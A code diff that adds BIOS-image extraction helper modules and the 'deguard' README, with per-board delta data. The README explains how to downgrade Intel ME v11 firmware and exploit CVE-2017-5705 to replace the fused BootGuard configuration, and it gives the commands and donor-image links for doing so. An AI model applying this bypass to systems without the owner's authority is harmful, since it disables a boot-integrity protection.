b/blobs/t480/biosutilities/common/checksums.py new file mode 100644 index 00000000..3e958ab1 --- /dev/null +++ b/blobs/t480/biosutilities/common/checksums.py @@ -0,0 +1,25 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Copyright (C) 2022 Plato Mavropoulos +""" + +# Get Checksum 16-bit +def get_chk_16(data, value=0, order='little'): + for idx in range(0, len(data), 2): + # noinspection PyTypeChecker + value += int.from_bytes(data[idx:idx + 2], order) + + value &= 0xFFFF + + return value + +# Get Checksum 8-bit XOR +def get_chk_8_xor(data, value=0): + for byte in data: + value ^= byte + + value ^= 0x0 + + return value diff --git a/blobs/t480/biosutilities/common/comp_efi.py b/blobs/t480/biosutilities/common/comp_efi.py new file mode 100644 index 00000000..2837898b --- /dev/null +++ b/blobs/t480/biosutilities/common/comp_efi.py @@ -0,0 +1,57 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Copyright (C) 2022 Plato Mavropoulos +""" + +import os +import subprocess + +from common.path_ops import project_root, safe_path +from common.system import get_os_ver, printer + +def get_compress_sizes(data): + size_compress = int.from_bytes(data[0x0:0x4], 'little') + size_original = int.from_bytes(data[0x4:0x8], 'little') + + return size_compress, size_original + +def is_efi_compressed(data, strict=True): + size_comp,size_orig = get_compress_sizes(data) + + check_diff = size_comp < size_orig + + if strict: + check_size = size_comp + 0x8 == len(data) + else: + check_size = size_comp + 0x8 <= len(data) + + return check_diff and check_size + +# Get TianoCompress path +def get_tiano_path(): + exec_name = f'TianoCompress{".exe" if get_os_ver()[1] else ""}' + + return safe_path(project_root(), ['external',exec_name]) + +# EFI/Tiano Decompression via TianoCompress +def efi_decompress(in_path, out_path, padding=0, silent=False, comp_type='--uefi'): + try: + subprocess.run([get_tiano_path(), '-d', in_path, '-o', out_path, '-q', comp_type], check=True, stdout=subprocess.DEVNULL) + + with open(in_path, 'rb') as file: + _,size_orig = get_compress_sizes(file.read()) + + if os.path.getsize(out_path) != size_orig: + raise Exception('EFI_DECOMPRESS_ERROR') + except Exception: + if not silent: + printer(f'Error: TianoCompress could not extract file {in_path}!', padding) + + return 1 + + if not silent: + printer('Succesfull EFI decompression via TianoCompress!', padding) + + return 0 diff --git a/blobs/t480/biosutilities/common/comp_szip.py b/blobs/t480/biosutilities/common/comp_szip.py new file mode 100644 index 00000000..fb6041b8 --- /dev/null +++ b/blobs/t480/biosutilities/common/comp_szip.py @@ -0,0 +1,72 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Copyright (C) 2022 Plato Mavropoulos +""" + +import os +import subprocess + +from common.path_ops import project_root, safe_path +from common.system import get_os_ver, printer + +# Get 7-Zip path +def get_szip_path(): + exec_name = '7z.exe' if get_os_ver()[1] else '7zzs' + + return safe_path(project_root(), ['external',exec_name]) + +# Check 7-Zip bad exit codes (0 OK, 1 Warning) +def check_bad_exit_code(exit_code): + if exit_code not in (0,1): + raise Exception(f'BAD_EXIT_CODE_{exit_code}') + +# Check if file is 7-Zip supported +def is_szip_supported(in_path, padding=0, args=None, check=False, silent=False): + try: + if args is None: + args = [] + + szip_c = [get_szip_path(), 't', in_path, *args, '-bso0', '-bse0', '-bsp0'] + + szip_t = subprocess.run(szip_c, check=False) + + if check: + check_bad_exit_code(szip_t.returncode) + except Exception: + if not silent: + printer(f'Error: 7-Zip could not check support for file {in_path}!', padding) + + return False + + return True + +# Archive decompression via 7-Zip +def szip_decompress(in_path, out_path, in_name, padding=0, args=None, check=False, silent=False): + if not in_name: + in_name = 'archive' + + try: + if args is None: + args = [] + + szip_c = [get_szip_path(), 'x', *args, '-aou', '-bso0', '-bse0', '-bsp0', f'-o{out_path}', in_path] + + szip_x = subprocess.run(szip_c, check=False) + + if check: + check_bad_exit_code(szip_x.returncode) + + if not os.path.isdir(out_path): + raise Exception('EXTRACT_DIR_MISSING') + except Exception: + if not silent: + printer(f'Error: 7-Zip could not extract {in_name} file {in_path}!', padding) + + return 1 + + if not silent: + printer(f'Succesfull {in_name} decompression via 7-Zip!', padding) + + return 0 diff --git a/blobs/t480/biosutilities/common/externals.py b/blobs/t480/biosutilities/common/externals.py new file mode 100644 index 00000000..f81e3b91 --- /dev/null +++ b/blobs/t480/biosutilities/common/externals.py @@ -0,0 +1,38 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Copyright (C) 2022 Plato Mavropoulos +""" + +from common.path_ops import project_root, safe_path +from common.system import get_os_ver + +# https://github.com/allowitsme/big-tool by Dmitry Frolov +# https://github.com/platomav/BGScriptTool by Plato Mavropoulos +def get_bgs_tool(): + try: + # noinspection PyUnresolvedReferences + from external.big_script_tool import BigScript # pylint: disable=E0401,E0611 + except Exception: + BigScript = None + + return BigScript + +# Get UEFIFind path +def get_uefifind_path(): + exec_name = f'UEFIFind{".exe" if get_os_ver()[1] else ""}' + + return safe_path(project_root(), ['external', exec_name]) + +# Get UEFIExtract path +def get_uefiextract_path(): + exec_name = f'UEFIExtract{".exe" if get_os_ver()[1] else ""}' + + return safe_path(project_root(), ['external', exec_name]) + +# Get ToshibaComExtractor path +def get_comextract_path(): + exec_name = f'comextract{".exe" if get_os_ver()[1] else ""}' + + return safe_path(project_root(), ['external', exec_name]) diff --git a/blobs/t480/biosutilities/common/num_ops.py b/blobs/t480/biosutilities/common/num_ops.py new file mode 100644 index 00000000..c37e4d74 --- /dev/null +++ b/blobs/t480/biosutilities/common/num_ops.py @@ -0,0 +1,14 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Copyright (C) 2022 Plato Mavropoulos +""" + +# https://leancrew.com/all-this/2020/06/ordinals-in-python/ by Dr. Drang +def get_ordinal(number): + s = ('th', 'st', 'nd', 'rd') + ('th',) * 10 + + v = number % 100 + + return f'{number}{s[v % 10]}' if v > 13 else f'{number}{s[v]}' diff --git a/blobs/t480/biosutilities/common/path_ops.py b/blobs/t480/biosutilities/common/path_ops.py new file mode 100644 index 00000000..bcff167b --- /dev/null +++ b/blobs/t480/biosutilities/common/path_ops.py @@ -0,0 +1,154 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Copyright (C) 2022 Plato Mavropoulos +""" + +import os +import re +import sys +import stat +import shutil +from pathlib import Path, PurePath + +from common.text_ops import is_encased, to_string + +# Fix illegal/reserved Windows characters +def safe_name(in_name): + name_repr = repr(in_name).strip("'") + + return re.sub(r'[\\/:"*?<>|]+', '_', name_repr) + +# Check and attempt to fix illegal/unsafe OS path traversals +def safe_path(base_path, user_paths): + # Convert base path to absolute path + base_path = real_path(base_path) + + # Merge user path(s) to string with OS separators + user_path = to_string(user_paths, os.sep) + + # Create target path from base + requested user path + target_path = norm_path(base_path, user_path) + + # Check if target path is OS illegal/unsafe + if is_safe_path(base_path, target_path): + return target_path + + # Re-create target path from base + leveled/safe illegal "path" (now file) + nuked_path = norm_path(base_path, safe_name(user_path)) + + # Check if illegal path leveling worked + if is_safe_path(base_path, nuked_path): + return nuked_path + + # Still illegal, raise exception to halt execution + raise Exception(f'ILLEGAL_PATH_TRAVERSAL: {user_path}') + +# Check for illegal/unsafe OS path traversal +def is_safe_path(base_path, target_path): + base_path = real_path(base_path) + + target_path = real_path(target_path) + + common_path = os.path.commonpath((base_path, target_path)) + + return base_path == common_path + +# Create normalized base path + OS separator + user path +def norm_path(base_path, user_path): + return os.path.normpath(base_path + os.sep + user_path) + +# Get absolute path, resolving any symlinks +def real_path(in_path): + return os.path.realpath(in_path) + +# Get Windows/Posix OS agnostic path +def agnostic_path(in_path): + return PurePath(in_path.replace('\\', os.sep)) + +# Get absolute parent of path +def path_parent(in_path): + return Path(in_path).parent.absolute() + +# Get final path component, with suffix +def path_name(in_path): + return PurePath(in_path).name + +# Get final path component, w/o suffix +def path_stem(in_path): + return PurePath(in_path).stem + +# Get list of path file extensions +def path_suffixes(in_path): + return PurePath(in_path).suffixes or [''] + +# Check if path is absolute +def is_path_absolute(in_path): + return Path(in_path).is_absolute() + +# Create folder(s), controlling parents, existence and prior deletion +def make_dirs(in_path, parents=True, exist_ok=False, delete=False): + if delete: + del_dirs(in_path) + + Path.mkdir(Path(in_path), parents=parents, exist_ok=exist_ok) + +# Delete folder(s), if present +def del_dirs(in_path): + if Path(in_path).is_dir(): + shutil.rmtree(in_path, onerror=clear_readonly) + +# Copy file to path with or w/o metadata +def copy_file(in_path, out_path, meta=False): + if meta: + shutil.copy2(in_path, out_path) + else: + shutil.copy(in_path, out_path) + +# Clear read-only file attribute (on shutil.rmtree error) +def clear_readonly(in_func, in_path, _): + os.chmod(in_path, stat.S_IWRITE) + in_func(in_path) + +# Walk path to get all files +def get_path_files(in_path): + path_files = [] + + for root, _, files in os.walk(in_path): + for name in files: + path_files.append(os.path.join(root, name)) + + return path_files + +# Get path without leading/trailing quotes +def get_dequoted_path(in_path): + out_path = to_string(in_path).strip() + + if len(out_path) >= 2 and is_encased(out_path, ("'",'"')): + out_path = out_path[1:-1] + + return out_path + +# Set utility extraction stem +def extract_suffix(): + return '_extracted' + +# Get utility extraction path +def get_extract_path(in_path, suffix=extract_suffix()): + return f'{in_path}{suffix}' + +# Get project's root directory +def project_root(): + root = Path(__file__).parent.parent + + return real_path(root) + +# Get runtime's root directory +def runtime_root(): + if getattr(sys, 'frozen', False): + root = Path(sys.executable).parent + else: + root = project_root() + + return real_path(root) diff --git a/blobs/t480/biosutilities/common/patterns.py b/blobs/t480/biosutilities/common/patterns.py new file mode 100644 index 00000000..ecdde393 --- /dev/null +++ b/blobs/t480/biosutilities/common/patterns.py @@ -0,0 +1,34 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Copyright (C) 2022 Plato Mavropoulos +""" + +import re + +PAT_AMI_PFAT = re.compile(br'_AMIPFAT.AMI_BIOS_GUARD_FLASH_CONFIGURATIONS', re.DOTALL) +PAT_AMI_UCP = re.compile(br'@(UAF|HPU).{12}@', re.DOTALL) +PAT_APPLE_EFI = re.compile(br'\$IBIOSI\$.{16}\x2E\x00.{6}\x2E\x00.{8}\x2E\x00.{6}\x2E\x00.{20}\x00{2}', re.DOTALL) +PAT_APPLE_IM4P = re.compile(br'\x16\x04IM4P\x16\x04mefi') +PAT_APPLE_PBZX = re.compile(br'pbzx') +PAT_APPLE_PKG = re.compile(br'xar!') +PAT_AWARD_LZH = re.compile(br'-lh[04567]-') +PAT_DELL_FTR = re.compile(br'\xEE\xAA\xEE\x8F\x49\x1B\xE8\xAE\x14\x37\x90') +PAT_DELL_HDR = re.compile(br'\xEE\xAA\x76\x1B\xEC\xBB\x20\xF1\xE6\x51.\x78\x9C', re.DOTALL) +PAT_DELL_PKG = re.compile(br'\x72\x13\x55\x00.{45}7zXZ', re.DOTALL) +PAT_FUJITSU_SFX = re.compile(br'FjSfxBinay\xB2\xAC\xBC\xB9\xFF{4}.{4}\xFF{4}.{4}\xFF{4}\xFC\xFE', re.DOTALL) +PAT_INSYDE_IFL = re.compile(br'\$_IFLASH') +PAT_INSYDE_SFX = re.compile(br'\x0D\x0A;!@InstallEnd@!\x0D\x0A(7z\xBC\xAF\x27|\x6E\xF4\x79\x5F\x4E)') +PAT_INTEL_ENG = re.compile(br'\x04\x00{3}[\xA1\xE1]\x00{3}.{8}\x86\x80.{9}\x00\$((MN2)|(MAN))', re.DOTALL) +PAT_INTEL_IFD = re.compile(br'\x5A\xA5\xF0\x0F.{172}\xFF{16}', re.DOTALL) +PAT_MICROSOFT_CAB = re.compile(br'MSCF\x00{4}') +PAT_MICROSOFT_MZ = re.compile(br'MZ') +PAT_MICROSOFT_PE = re.compile(br'PE\x00{2}') +PAT_PHOENIX_TDK = re.compile(br'\$PACK\x00{3}..\x00{2}.\x00{3}', re.DOTALL) +PAT_PORTWELL_EFI = re.compile(br'') +PAT_TOSHIBA_COM = re.compile(br'\x00{2}[\x00-\x02]BIOS.{20}[\x00\x01]', re.DOTALL) +PAT_VAIO_CAB = re.compile(br'\xB2\xAC\xBC\xB9\xFF{4}.{4}\xFF{4}.{4}\xFF{4}\xFC\xFE', re.DOTALL) +PAT_VAIO_CFG = re.compile(br'\[Setting]\x0D\x0A') +PAT_VAIO_CHK = re.compile(br'\x0AUseVAIOCheck=') +PAT_VAIO_EXT = re.compile(br'\x0AExtractPathByUser=') diff --git a/blobs/t480/biosutilities/common/pe_ops.py b/blobs/t480/biosutilities/common/pe_ops.py new file mode 100644 index 00000000..ba23828d --- /dev/null +++ b/blobs/t480/biosutilities/common/pe_ops.py @@ -0,0 +1,49 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Copyright (C) 2022 Plato Mavropoulos +""" + +import pefile + +from common.system import printer +from common.text_ops import file_to_bytes + +# Check if input is a PE file +def is_pe_file(in_file): + return bool(get_pe_file(in_file)) + +# Get pefile object from PE file +def get_pe_file(in_file, fast=True): + in_buffer = file_to_bytes(in_file) + + try: + # Analyze detected MZ > PE image buffer + pe_file = pefile.PE(data=in_buffer, fast_load=fast) + except Exception: + pe_file = None + + return pe_file + +# Get PE info from pefile object +def get_pe_info(pe_file): + try: + # When fast_load is used, IMAGE_DIRECTORY_ENTRY_RESOURCE must be parsed prior to FileInfo > StringTable + pe_file.parse_data_directories(directories=[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_RESOURCE']]) + + # Retrieve MZ > PE > FileInfo > StringTable information + pe_info = pe_file.FileInfo[0][0].StringTable[0].entries + except Exception: + pe_info = {} + + return pe_info + +# Print PE info from pefile StringTable +def show_pe_info(pe_info, padding=0): + if type(pe_info).__name__ == 'dict': + for title,value in pe_info.items(): + info_title = title.decode('utf-8','ignore').strip() + info_value = value.decode('utf-8','ignore').strip() + if info_title and info_value: + printer(f'{info_title}: {info_value}', padding, new_line=False) diff --git a/blobs/t480/biosutilities/common/struct_ops.py b/blobs/t480/biosutilities/common/struct_ops.py new file mode 100644 index 00000000..b995ba14 --- /dev/null +++ b/blobs/t480/biosutilities/common/struct_ops.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Copyright (C) 2022 Plato Mavropoulos +""" + +import ctypes + +char = ctypes.c_char +uint8_t = ctypes.c_ubyte +uint16_t = ctypes.c_ushort +uint32_t = ctypes.c_uint +uint64_t = ctypes.c_uint64 + +# https://github.com/skochinsky/me-tools/blob/master/me_unpack.py by Igor Skochinsky +def get_struct(buffer, start_offset, class_name, param_list=None): + if param_list is None: + param_list = [] + + structure = class_name(*param_list) # Unpack parameter list + struct_len = ctypes.sizeof(structure) + struct_data = buffer[start_offset:start_offset + struct_len] + fit_len = min(len(struct_data), struct_len) + + ctypes.memmove(ctypes.addressof(structure), struct_data, fit_len) + + return structure diff --git a/blobs/t480/biosutilities/common/system.py b/blobs/t480/biosutilities/common/system.py new file mode 100644 index 00000000..9598e302 --- /dev/null +++ b/blobs/t480/biosutilities/common/system.py @@ -0,0 +1,68 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Copyright (C) 2022 Plato Mavropoulos +""" + +import sys + +from common.text_ops import padder, to_string + +# Get Python Version (tuple) +def get_py_ver(): + return sys.version_info + +# Get OS Platform (string) +def get_os_ver(): + sys_os = sys.platform + + is_win = sys_os == 'win32' + is_lnx = sys_os.startswith('linux') or sys_os == 'darwin' or sys_os.find('bsd') != -1 + + return sys_os, is_win, is_win or is_lnx + +# Check for --auto-exit|-e +def is_auto_exit(): + return bool('--auto-exit' in sys.argv or '-e' in sys.argv) + +# Check Python Version +def check_sys_py(): + sys_py = get_py_ver() + + if sys_py < (3,10): + sys.stdout.write(f'\nError: Python >= 3.10 required, not {sys_py[0]}.{sys_py[1]}!') + + if not is_auto_exit(): + # noinspection PyUnresolvedReferences + (raw_input if sys_py[0] <= 2 else input)('\nPress enter to exit') # pylint: disable=E0602 + + sys.exit(125) + +# Check OS Platform +def check_sys_os(): + os_tag,os_win,os_sup = get_os_ver() + + if not os_sup: + printer(f'Error: Unsupported platform "{os_tag}"!') + + if not is_auto_exit(): + input('\nPress enter to exit') + + sys.exit(126) + + # Fix Windows Unicode console redirection + if os_win: + sys.stdout.reconfigure(encoding='utf-8') + +# Show message(s) while controlling padding, newline, pausing & separator +def printer(in_message='', padd_count=0, new_line=True, pause=False, sep_char=' '): + message = to_string(in_message, sep_char) + + padding = padder(padd_count) + + newline = '\n' if new_line else '' + + output = newline + padding + message + + (input if pause and not is_auto_exit() else print)(output) diff --git a/blobs/t480/biosutilities/common/templates.py b/blobs/t480/biosutilities/common/templates.py new file mode 100644 index 00000000..f69af33f --- /dev/null +++ b/blobs/t480/biosutilities/common/templates.py @@ -0,0 +1,162 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Copyright (C) 2022 Plato Mavropoulos +""" + +import os +import sys +import ctypes +import argparse +import traceback + +from common.num_ops import get_ordinal +from common.path_ops import get_dequoted_path, get_extract_path, get_path_files, is_path_absolute, path_parent, runtime_root, safe_path +from common.system import check_sys_os, check_sys_py, get_os_ver, is_auto_exit, printer + +class BIOSUtility: + + MAX_FAT32_ITEMS = 65535 + + def __init__(self, title, check, main, padding=0): + self._title = title + self._main = main + self._check = check + self._padding = padding + self._arguments_kw = {} + + # Initialize argparse argument parser + self._argparser = argparse.ArgumentParser() + + self._argparser.add_argument('files', type=argparse.FileType('r', encoding='utf-8'), nargs='*') + self._argparser.add_argument('-e', '--auto-exit', help='skip all user action prompts', action='store_true') + self._argparser.add_argument('-v', '--version', help='show utility name and version', action='store_true') + self._argparser.add_argument('-o', '--output-dir', help='extract in given output directory') + self._argparser.add_argument('-i', '--input-dir', help='extract from given input directory') + + self._arguments,self._arguments_unk = self._argparser.parse_known_args() + + # Managed Python exception handler + sys.excepthook = self._exception_handler + + # Check Python Version + check_sys_py() + + # Check OS Platform + check_sys_os() + + # Show Script Title + printer(self._title, new_line=False) + + # Show Utility Version on demand + if self._arguments.version: + sys.exit(0) + + # Set console/terminal window title (Windows only) + if get_os_ver()[1]: + ctypes.windll.kernel32.SetConsoleTitleW(self._title) + + # Process input files and generate output path + self._process_input_files() + + # Count input files for exit code + self._exit_code = len(self._input_files) + + def parse_argument(self, *args, **kwargs): + _dest = self._argparser.add_argument(*args, **kwargs).dest + self._arguments = self._argparser.parse_known_args(self._arguments_unk)[0] + self._arguments_kw.update({_dest: self._arguments.__dict__[_dest]}) + + def run_utility(self): + for _input_file in self._input_files: + _input_name = os.path.basename(_input_file) + + printer(['***', _input_name], self._padding) + + if not self._check(_input_file): + printer('Error: This is not a supported input!', self._padding + 4) + + continue # Next input file + + _extract_path = os.path.join(self._output_path, get_extract_path(_input_name)) + + if os.path.isdir(_extract_path): + for _suffix in range(2, self.MAX_FAT32_ITEMS): + _renamed_path = f'{os.path.normpath(_extract_path)}_{get_ordinal(_suffix)}' + + if not os.path.isdir(_renamed_path): + _extract_path = _renamed_path + + break # Extract path is now unique + + if self._main(_input_file, _extract_path, self._padding + 4, **self._arguments_kw) in [0, None]: + self._exit_code -= 1 + + printer('Done!', pause=True) + + sys.exit(self._exit_code) + + # Process input files + def _process_input_files(self): + self._input_files = [] + + if len(sys.argv) >= 2: + # Drag & Drop or CLI + if self._arguments.input_dir: + _input_path_user = self._arguments.input_dir + _input_path_full = self._get_input_path(_input_path_user) if _input_path_user else '' + self._input_files = get_path_files(_input_path_full) + else: + # Parse list of input files (i.e. argparse FileType objects) + for _file_object in self._arguments.files: + # Store each argparse FileType object's name (i.e. path) + self._input_files.append(_file_object.name) + # Close each argparse FileType object (i.e. allow input file changes) + _file_object.close() + + # Set output fallback value for missing argparse Output and Input Path + _output_fallback = path_parent(self._input_files[0]) if self._input_files else None + + # Set output path via argparse Output path or argparse Input path or first input file path + _output_path = self._arguments.output_dir or self._arguments.input_dir or _output_fallback + else: + # Script w/o parameters + _input_path_user = get_dequoted_path(input('\nEnter input directory path: ')) + _input_path_full = self._get_input_path(_input_path_user) if _input_path_user else '' + self._input_files = get_path_files(_input_path_full) + + _output_path = get_dequoted_path(input('\nEnter output directory path: ')) + + self._output_path = self._get_input_path(_output_path) + + # Get absolute input file path + @staticmethod + def _get_input_path(input_path): + if not input_path: + # Use runtime directory if no user path is specified + absolute_path = runtime_root() + else: + # Check if user specified path is absolute + if is_path_absolute(input_path): + absolute_path = input_path + # Otherwise, make it runtime directory relative + else: + absolute_path = safe_path(runtime_root(), input_path) + + return absolute_path + + # https://stackoverflow.com/a/781074 by Torsten Marek + @staticmethod + def _exception_handler(exc_type, exc_value, exc_traceback): + if exc_type is KeyboardInterrupt: + printer('') + else: + printer('Error: Utility crashed, please report the following:\n') + + traceback.print_exception(exc_type, exc_value, exc_traceback) + + if not is_auto_exit(): + input('\nPress enter to exit') + + sys.exit(127) diff --git a/blobs/t480/biosutilities/common/text_ops.py b/blobs/t480/biosutilities/common/text_ops.py new file mode 100644 index 00000000..f0070512 --- /dev/null +++ b/blobs/t480/biosutilities/common/text_ops.py @@ -0,0 +1,33 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Copyright (C) 2022 Plato Mavropoulos +""" + +# Generate padding (spaces or tabs) +def padder(padd_count, tab=False): + return ('\t' if tab else ' ') * padd_count + +# Get String from given input object +def to_string(in_object, sep_char=''): + if type(in_object).__name__ in ('list','tuple'): + out_string = sep_char.join(map(str, in_object)) + else: + out_string = str(in_object) + + return out_string + +# Get Bytes from given buffer or file path +def file_to_bytes(in_object): + object_bytes = in_object + + if type(in_object).__name__ not in ('bytes','bytearray'): + with open(to_string(in_object), 'rb') as object_data: + object_bytes = object_data.read() + + return object_bytes + +# Check if string starts and ends with given character(s) +def is_encased(in_string, chars): + return in_string.startswith(chars) and in_string.endswith(chars) diff --git a/blobs/t480/biosutilities/external/requirements.txt b/blobs/t480/biosutilities/external/requirements.txt new file mode 100644 index 00000000..798c16cf --- /dev/null +++ b/blobs/t480/biosutilities/external/requirements.txt @@ -0,0 +1,2 @@ +lznt1 >= 0.2 +pefile >= 2022.5.30 diff --git a/blobs/t480/deguard/.gitignore b/blobs/t480/deguard/.gitignore new file mode 100644 index 00000000..834b16bd --- /dev/null +++ b/blobs/t480/deguard/.gitignore @@ -0,0 +1,2 @@ +__pycache__ +test diff --git a/blobs/t480/deguard/README.md b/blobs/t480/deguard/README.md new file mode 100644 index 00000000..186001ce --- /dev/null +++ b/blobs/t480/deguard/README.md @@ -0,0 +1,81 @@ +# Bypass Intel BootGuard on ME v11.x.x.x hardware + +This utility allows generating BootGuard bypass images for hardware running ME v11.x.x.x firmware. + +This includes Skylake, Kaby Lake, and some Coffee Lake PCHs. Both the H (desktop) and LP (mobile) firmware +varaints are supported. + +## Background + +This uses [CVE-2017-5705](https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00086.html). + +It has been fixed by Intel in newer ME v11.x.x.x firmware releases, however ME11 hardware has no protection +against downgrading the ME version by overwriting the SPI flash physically, thus we can downgrade to a vulnerable +version. + +After downgrade, we exploit the bup module of the vulnerable firmware, overwriting the copy of field programmable fuses +stored in SRAM, resulting in the fused BootGuard configuration being replaced with our desired one. + +## Adding new target + +As a board porter, you need to provide the delta between the default and vendor provided ME configuration. + +This goes in the `data/delta/` directory for each target. + +To obtain this, dump the vendor firmware from your board, and execute: + +`./generatedelta.py --input --output data/delta/` + +Note the delta generation only takes your factory dump as an input. This is because an ME image contains both the +default and system specific configuration, and these can be compared by deguard. + +You *must discard* the `/home/secureboot` directory from the delta for the zero FPF config to work. + +You can optionally also discard `home/{amt,fwupdate,pavp,ptt}` from the delta. + +## Generating images for an existing target + +As a user wishing to generate an image for a supported target: + +You will need to obtain a donor image for your platform variant with a supported ME version (see URLs below). + +This can either be a full image with a flash descriptor or just a bare ME region. + +Afterwards, execute the following command and enjoy: + +`./finalimage.py --delta data/delta/ --version --pch --sku <2M or 5M SKU> --fake-fpfs data/fpfs/zero --input --output ` + +The output will be a bare deguard patched ME region. + +Please note: +- The **the HAP bit must be enabled** in your flash descriptor for deguard generated ME images to work. +- The DCI bit must be enabled in your flash descriptor for DCI debugging over USB. + + +## Note on field programmable fuses + +This document recommends faking a set of FPFs that are all zero as a BootGuard bypass strategy. + +This causes the platform to work in legacy mode, and does not require dumping the fuses from the PCH. + +It is also possible to enable measured mode instead (there is some example FPF data for this). + +Theoretically it is possible to even re-enable BootGuard with a custom private key (with the caveat that it is +obviously insecure against physical access). + +## Donor images + +This section lists some URLs to recommended and tested donor images. Any image with a supported firmware +version and variant ought to work, but the path of least resistance is for everyone to use the same images. + +|Version|Variant|SKU|URL|Notes| +|-|-|-|-| +|11.6.0.1126|H (Desktop)|2M|[link](https://web.archive.org/web/20230822134231/https://download.asrock.com/BIOS/1151/H110M-DGS(7.30)ROM.zip)|Zipped flash image| +|11.6.0.1126|LP (Laptop)|2M|[link](https://web.archive.org/web/20241110222323/https://dl.dell.com/FOLDER04573471M/1/Inspiron_5468_1.3.0.exe)|Dell BIOS update (use Dell_PFS_Extract.py)| + +## Thanks + +Thanks goes to PT Research and Youness El Alaoui for previous work on exploiting Intel SA 00086, which this PoC is heavily reliant on. + +- [IntelTXE-PoC](https://github.com/kakaroto/IntelTXE-PoC) +- [MFSUtil](https://github.com/kakaroto/MFSUtil) diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/bup/bup_sku/emu_fuse_map b/blobs/t480/deguard/data/delta/optiplex_3050/home/bup/bup_sku/emu_fuse_map new file mode 100644 index 00000000..78259a9d Binary files /dev/null and b/blobs/t480/deguard/data/delta/optiplex_3050/home/bup/bup_sku/emu_fuse_map differ diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/bup/bup_sku/fuse_ip_base b/blobs/t480/deguard/data/delta/optiplex_3050/home/bup/bup_sku/fuse_ip_base new file mode 100644 index 00000000..658a9660 Binary files /dev/null and b/blobs/t480/deguard/data/delta/optiplex_3050/home/bup/bup_sku/fuse_ip_base differ diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/bup/bup_sku/plat_n_sku b/blobs/t480/deguard/data/delta/optiplex_3050/home/bup/bup_sku/plat_n_sku new file mode 100644 index 00000000..96296af2 --- /dev/null +++ b/blobs/t480/deguard/data/delta/optiplex_3050/home/bup/bup_sku/plat_n_sku @@ -0,0 +1 @@ +/€ \ No newline at end of file diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/bup/mbp b/blobs/t480/deguard/data/delta/optiplex_3050/home/bup/mbp new file mode 100644 index 00000000..6d3c0ed7 Binary files /dev/null and b/blobs/t480/deguard/data/delta/optiplex_3050/home/bup/mbp differ diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/gpio/csme_pins b/blobs/t480/deguard/data/delta/optiplex_3050/home/gpio/csme_pins new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/dynregs b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/dynregs new file mode 100644 index 00000000..23c1ea27 Binary files /dev/null and b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/dynregs differ diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/header b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/header new file mode 100644 index 00000000..4b755560 Binary files /dev/null and b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/header differ diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/namestr b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/namestr new file mode 100644 index 00000000..6f8c6989 Binary files /dev/null and b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/namestr differ diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof0 b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof0 new file mode 100644 index 00000000..dab085a9 Binary files /dev/null and b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof0 differ diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof1 b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof1 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof10 b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof10 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof2 b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof2 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof3 b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof3 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof4 b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof4 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof5 b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof5 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof6 b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof6 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof7 b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof7 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof8 b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof8 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof9 b/blobs/t480/deguard/data/delta/optiplex_3050/home/icc/prof9 new file mode 100644 index 00000000..e69de29b diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/mca/eom b/blobs/t480/deguard/data/delta/optiplex_3050/home/mca/eom new file mode 100644 index 00000000..6b2aaa76 --- 